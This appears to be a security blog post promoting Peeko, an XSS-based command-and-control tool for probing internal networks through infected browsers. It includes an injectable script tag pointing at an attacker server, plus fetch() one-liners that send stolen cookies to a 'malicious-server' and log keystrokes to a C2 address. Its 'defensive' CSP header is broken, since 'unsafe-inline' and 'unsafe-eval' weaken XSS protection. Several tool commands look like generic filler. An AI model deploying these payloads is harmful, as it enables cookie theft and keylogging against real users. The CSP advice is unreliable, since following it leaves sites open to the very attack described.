Peeko – Browser-based XSS C2 for Stealthy Internal Network Exploration

By /

Listen to this Post

Featured Image
GitHub – b3rito/peeko: peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.
github.com/b3rito/peeko

You Should Know:

Peeko is a powerful browser-based Command and Control (C2) framework designed for internal network reconnaissance via Cross-Site Scripting (XSS). It enables attackers to stealthily explore internal networks by leveraging infected browsers. Below are key technical details, commands, and practical implementations related to Peeko.

Installation & Setup

1. Clone the Repository:

git clone https://github.com/b3rito/peeko.git
cd peeko

2. Install Dependencies:

pip3 install -r requirements.txt

3. Run the Server:

python3 peeko.py

Generating XSS Payloads

Peeko allows dynamic payload generation for browser exploitation.

<script src="http://<YOUR_SERVER_IP>:8080/peeko.js"></script>

Key Commands for Network Exploration

  • List Internal Hosts: 
    peeko> scan --hosts
  • Port Scanning via Infected Browser: 
    peeko> scan --ports 80,443,22,3389
  • Exfiltrate HTTP Requests: 
    peeko> capture --http

Post-Exploitation Techniques

  • Stealing Cookies: 
    fetch('http://malicious-server/steal', { method: 'POST', body: document.cookie });
  • Keylogging: 
    document.addEventListener('keypress', (e) => { fetch('http://<C2_IP>/log?key=' + e.key); });

Defensive Measures (Blue Team)

  • Detecting Peeko Activity: 
    sudo tcpdump -i eth0 'port 8080' -w peeko_traffic.pcap
  • Blocking Malicious Domains: 
    sudo iptables -A INPUT -s <MALICIOUS_IP> -j DROP

What Undercode Say

Peeko demonstrates how XSS can be weaponized for internal network reconnaissance. Defenders must:
– Implement CSP (Content Security Policy): 

Content-Security-Policy: default-src 'self'; script-src 'unsafe-inline' 'unsafe-eval';

– Monitor Suspicious Browser Behavior: 

grep -r "peeko.js" /var/log/nginx/

– Use Browser Isolation: 

docker run -d --name isolated-browser -p 8080:8080 browserless/chrome

Additional Linux & Windows Commands for Security

  • Linux: 
    Check active connections
netstat -tulnp | grep 8080

Analyze JavaScript files
strings peeko.js | grep "C2"

  • Windows: 

    Detect outbound connections
Get-NetTCPConnection -RemotePort 8080

Block IP via Firewall
New-NetFirewallRule -DisplayName "Block Peeko C2" -Direction Outbound -RemoteAddress <MALICIOUS_IP> -Action Block

Expected Output:

A functional Peeko C2 server with active XSS payloads, logging internal network data while evading detection via browser-based obfuscation.

URLs:

References:

Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: